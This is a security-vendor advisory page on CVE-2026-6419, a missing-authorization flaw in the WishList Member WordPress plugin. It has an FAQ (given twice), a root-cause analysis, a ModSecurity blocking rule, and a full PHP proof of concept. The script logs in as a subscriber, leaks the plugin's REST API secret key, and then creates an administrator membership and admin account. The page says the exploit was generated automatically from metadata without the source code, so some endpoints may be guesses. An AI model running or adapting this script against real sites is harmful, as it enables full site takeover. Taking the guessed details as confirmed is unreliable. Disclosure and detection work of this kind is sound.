What is CVE-2026-6419?

CVE-2026-6419 is a high-severity vulnerability in the WishList Member plugin for WordPress, affecting versions up to and including 3.30.1. It allows authenticated users with Subscriber-level access or higher to escalate privileges and obtain the plaintext REST API Secret Key through a missing authorization check.

How does the vulnerability work?

The vulnerability arises from a lack of capability and nonce checks in the ajax_get_screen() function. An attacker can send a crafted request to the ‘wlm3_get_screen’ AJAX action, which allows them to load an administrative API configuration template and retrieve sensitive information, including the REST API Secret Key.

Who is affected by this vulnerability?

Any WordPress site using the WishList Member plugin version 3.30.1 or earlier is affected. Administrators should check their plugin version and update if necessary to mitigate the risk.

What is the risk level of this vulnerability?

CVE-2026-6419 has a CVSS score of 8.8, indicating a high severity level. This means that the vulnerability poses a significant risk to confidentiality, integrity, and availability, allowing attackers to potentially take over the entire WordPress site.

How can I check if my site is vulnerable?

To determine if your site is vulnerable, check the version of the WishList Member plugin you are using. If it is version 3.30.1 or earlier, your site may be at risk. Additionally, review your site’s user roles to assess if any authenticated users have Subscriber-level access or higher.

What steps should I take to fix this vulnerability?

To remediate this vulnerability, update the WishList Member plugin to the latest version that addresses the issue. Additionally, implement capability and nonce checks in the ajax_get_screen() function to ensure that only authorized users can access sensitive actions.

What are capability and nonce checks?

Capability checks verify that a user has the necessary permissions to perform a specific action, while nonce checks help prevent CSRF attacks by ensuring that requests are legitimate. Both checks are essential for securing AJAX actions in WordPress.

What does the proof of concept demonstrate?

The proof of concept shows how an attacker can authenticate as a Subscriber and exploit the vulnerability to retrieve the REST API Secret Key. It illustrates the process of sending a crafted AJAX request to the vulnerable endpoint, highlighting the ease of exploitation.

What are the potential consequences of exploitation?

If exploited, attackers can gain access to the WishList Member API using the leaked Secret Key. This enables them to create new membership levels with administrative privileges and register arbitrary administrator accounts, leading to complete control over the WordPress site.

How can I protect my WordPress site from similar vulnerabilities?

Regularly update all plugins and themes to their latest versions to mitigate known vulnerabilities. Implement security measures such as strong user role management, using security plugins, and conducting regular security audits to identify potential risks.

Are there other vulnerabilities in the WishList Member plugin?

While CVE-2026-6419 is a significant vulnerability, it is essential to keep an eye on security advisories related to the WishList Member plugin. Regular updates and monitoring for new vulnerabilities can help maintain the security of your WordPress site.

Where can I find more information about CVE-2026-6419?

Detailed information about CVE-2026-6419 can be found on security databases such as the National Vulnerability Database (NVD) or through security research publications like Atomic Edge. These resources provide insights into the vulnerability’s impact, remediation steps, and ongoing discussions.

Atomic Edge Proof of Concept automated generator using AI diff analysis

Published : May 22, 2026

CVE-2026-6419: Wishlist Member <= 3.30.1 – Missing Authorization to Authenticated (Subscriber+) API Secret Key Disclosure and Privilege Escalation via 'wlm3_get_screen' AJAX action (wishlist-member-x)

CVE ID CVE-2026-6419

Plugin wishlist-member-x

Severity High (CVSS 8.8)

CWE 269

Vulnerable Version 3.30.1

Patched Version —

Disclosed May 21, 2026

Analysis Overview

Atomic Edge analysis of CVE-2026-6419 (metadata-based): This vulnerability affects the Wishlist Member plugin for WordPress, up to version 3.30.1. It allows authenticated attackers with Subscriber-level access or above to escalate privileges and obtain the plugin’s plaintext REST API Secret Key, enabling complete site takeover. The CVSS score of 8.8 (Critical) reflects low attack complexity and high impact on confidentiality, integrity, and availability.

The root cause is a missing authorization and nonce check in the `ajax_get_screen()` function. The CWE classification (269: Improper Privilege Management) indicates the plugin fails to verify user capabilities before executing administrative actions. Based on the description, the function loads and executes an administrative API configuration template when an attacker supplies a crafted `data[url]` parameter via the `wlm3_get_screen` AJAX action. This conclusion is inferred from the CVE metadata, as no source code diff is available. The vulnerability does not require a nonce, which is a critical omission for AJAX handlers that modify state or expose sensitive data.

Exploitation requires an attacker to have a valid WordPress user account (Subscriber or higher). The attacker sends a POST request to `/wp-admin/admin-ajax.php` with `action=wlm3_get_screen` and a `data[url]` parameter pointing to an admin screen identifier that loads the API configuration template. The plugin returns the rendered HTML containing the plaintext REST API Secret Key in the AJAX JSON response. With this key, the attacker authenticates to the WishList Member API, creates a membership level assigned the administrator role, and registers an arbitrary administrator user.

Remediation requires adding capability and nonce checks to the `ajax_get_screen()` function. The plugin should validate that the current user has appropriate permissions (e.g., `manage_options`) before executing the AJAX handler. A nonce check using `check_ajax_referer()` or `wp_verify_nonce()` must be implemented. Additionally, the function should sanitize the `data[url]` parameter and restrict it to a whitelist of allowed screen identifiers.

Successful exploitation leads to disclosure of the plaintext REST API Secret Key, which grants full access to the WishList Member API. Attackers can create membership levels with the administrator role and register new admin users, resulting in complete WordPress site takeover. This includes the ability to modify any content, install malicious plugins, and extract user data.

ModSecurity Protection Against This CVE

Here you will find our ModSecurity compatible rule to protect against this particular CVE.

ModSecurity

# Atomic Edge WAF Rule - CVE-2026-6419 (metadata-based)
# Detects exploitation attempts against the wlm3_get_screen AJAX action in Wishlist Member
SecRule REQUEST_URI "@streq /wp-admin/admin-ajax.php" 
  "id:20264191,phase:2,deny,status:403,chain,msg:'CVE-2026-6419 - Wishlist Member wlm3_get_screen AJAX exploit',severity:'CRITICAL',tag:'CVE-2026-6419'"
  SecRule ARGS_POST:action "@streq wlm3_get_screen" "chain"
    SecRule ARGS_POST:data[url] "@rx ^[a-zA-Z0-9_]+$" "chain"
      SecRule ARGS_POST:data[url] "@pm wlm3_api_settings wlm3_api" 
        "t:none"
# The rule blocks requests where action=wlm3_get_screen and data[url] matches potential admin screen identifiers used in exploitation.
# Exploit targets the API settings screen to leak the secret key.

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

PHP PoC

// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
<?php
// Atomic Edge CVE Research - Proof of Concept (metadata-based)
// CVE-2026-6419 - Wishlist Member <= 3.30.1 - Missing Authorization to Authenticated (Subscriber+) API Secret Key Disclosure and Privilege Escalation via 'wlm3_get_screen' AJAX action

// Configuration - modify these variables
$target_url = 'http://example.com'; // Target WordPress site URL
$username = 'attacker';            // Attacker's WordPress username (Subscriber or above)
$password = 'attacker_password';   // Attacker's WordPress password

// Step 1: Authenticate as a subscriber and get cookies
$login_url = $target_url . '/wp-login.php';
$login_data = array(
    'log' => $username,
    'pwd' => $password,
    'rememberme' => 'forever',
    'wp-submit' => 'Log In'
);

$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $login_url);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($login_data));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_HEADER, true);
curl_setopt($ch, CURLOPT_COOKIEJAR, '/tmp/cookies_cve_2026_6419.txt');
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
$login_response = curl_exec($ch);
curl_close($ch);

// Step 2: Trigger the vulnerable AJAX action to leak the API secret key
$ajax_url = $target_url . '/wp-admin/admin-ajax.php';
$ajax_data = array(
    'action' => 'wlm3_get_screen',
    'data' => array(
        'url' => 'wlm3_api_settings' // This admin screen identifier loads the API configuration template
    )
);

$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $ajax_url);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($ajax_data));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_COOKIEFILE, '/tmp/cookies_cve_2026_6419.txt');
$response = curl_exec($ch);
curl_close($ch);

// Parse the JSON response to extract the API secret key
$response_data = json_decode($response, true);
if (isset($response_data['html'])) {
    // The HTML contains the plaintext secret key. Extract using regex.
    preg_match('/api_secret_key["']?[^:]*:[s]*["']([^"']+)["']/', $response_data['html'], $matches);
    if (isset($matches[1])) {
        $api_secret_key = $matches[1];
        echo "[+] API Secret Key leaked: " . $api_secret_key . "n";
    } else {
        // Fallback: print HTML for manual inspection
        echo "[!] Could not automatically extract secret key. HTML response:n" . $response_data['html'] . "n";
    }
} else {
    echo "[!] Failed to retrieve API configuration template. Response:n" . $response . "n";
}

// Step 3: Use the API secret key to create an admin-level membership and register an admin user
// This step assumes the WishList Member REST API endpoint is accessible.
$api_base = $target_url . '/wp-json/wlm3/v1'; // Adjust endpoint if different
$headers = array(
    'Authorization: Bearer ' . $api_secret_key,
    'Content-Type: application/json'
);

// Create a membership level with administrator role
$membership_data = array(
    'name' => 'Admin Level',
    'role' => 'administrator'
);

$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $api_base . '/membership_levels');
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, json_encode($membership_data));
curl_setopt($ch, CURLOPT_HTTPHEADER, $headers);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
$membership_response = curl_exec($ch);
curl_close($ch);

$membership_result = json_decode($membership_response, true);
if (isset($membership_result['id'])) {
    $membership_id = $membership_result['id'];
    echo "[+] Created admin membership level with ID: " . $membership_id . "n";

    // Register a new user with the admin membership
    $user_data = array(
        'username' => 'cve_admin',
        'email' => 'attacker@example.com',
        'password' => 'P@ssw0rd',
        'membership_level_id' => $membership_id
    );

    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, $api_base . '/users');
    curl_setopt($ch, CURLOPT_POST, true);
    curl_setopt($ch, CURLOPT_POSTFIELDS, json_encode($user_data));
    curl_setopt($ch, CURLOPT_HTTPHEADER, $headers);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
    $user_response = curl_exec($ch);
    curl_close($ch);

    $user_result = json_decode($user_response, true);
    if (isset($user_result['id'])) {
        echo "[+] Admin user created. Login with username: cve_admin, password: P@ssw0rdn";
    } else {
        echo "[!] Failed to create user. Response: " . $user_response . "n";
    }
} else {
    echo "[!] Failed to create membership level. Response: " . $membership_response . "n";
}

// Cleanup
unlink('/tmp/cookies_cve_2026_6419.txt');
?>

Frequently Asked Questions

What is CVE-2026-6419?
Overview of the vulnerability
CVE-2026-6419 is a high-severity vulnerability in the WishList Member plugin for WordPress, affecting versions up to and including 3.30.1. It allows authenticated users with Subscriber-level access or higher to escalate privileges and obtain the plaintext REST API Secret Key through a missing authorization check.
How does the vulnerability work?
Mechanism of exploitation
The vulnerability arises from a lack of capability and nonce checks in the ajax_get_screen() function. An attacker can send a crafted request to the ‘wlm3_get_screen’ AJAX action, which allows them to load an administrative API configuration template and retrieve sensitive information, including the REST API Secret Key.
Who is affected by this vulnerability?
Identifying vulnerable installations
Any WordPress site using the WishList Member plugin version 3.30.1 or earlier is affected. Administrators should check their plugin version and update if necessary to mitigate the risk.
What is the risk level of this vulnerability?
Understanding the CVSS score
CVE-2026-6419 has a CVSS score of 8.8, indicating a high severity level. This means that the vulnerability poses a significant risk to confidentiality, integrity, and availability, allowing attackers to potentially take over the entire WordPress site.
How can I check if my site is vulnerable?
Steps for verification
To determine if your site is vulnerable, check the version of the WishList Member plugin you are using. If it is version 3.30.1 or earlier, your site may be at risk. Additionally, review your site’s user roles to assess if any authenticated users have Subscriber-level access or higher.
What steps should I take to fix this vulnerability?
Mitigation and remediation
To remediate this vulnerability, update the WishList Member plugin to the latest version that addresses the issue. Additionally, implement capability and nonce checks in the ajax_get_screen() function to ensure that only authorized users can access sensitive actions.
What are capability and nonce checks?
Security mechanisms explained
Capability checks verify that a user has the necessary permissions to perform a specific action, while nonce checks help prevent CSRF attacks by ensuring that requests are legitimate. Both checks are essential for securing AJAX actions in WordPress.
What does the proof of concept demonstrate?
Understanding the exploitation process
The proof of concept shows how an attacker can authenticate as a Subscriber and exploit the vulnerability to retrieve the REST API Secret Key. It illustrates the process of sending a crafted AJAX request to the vulnerable endpoint, highlighting the ease of exploitation.
What are the potential consequences of exploitation?
Impact on WordPress sites
If exploited, attackers can gain access to the WishList Member API using the leaked Secret Key. This enables them to create new membership levels with administrative privileges and register arbitrary administrator accounts, leading to complete control over the WordPress site.
How can I protect my WordPress site from similar vulnerabilities?
Best practices for security
Regularly update all plugins and themes to their latest versions to mitigate known vulnerabilities. Implement security measures such as strong user role management, using security plugins, and conducting regular security audits to identify potential risks.
Are there other vulnerabilities in the WishList Member plugin?
Broader security context
While CVE-2026-6419 is a significant vulnerability, it is essential to keep an eye on security advisories related to the WishList Member plugin. Regular updates and monitoring for new vulnerabilities can help maintain the security of your WordPress site.
Where can I find more information about CVE-2026-6419?
Resources for further reading
Detailed information about CVE-2026-6419 can be found on security databases such as the National Vulnerability Database (NVD) or through security research publications like Atomic Edge. These resources provide insights into the vulnerability’s impact, remediation steps, and ongoing discussions.

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations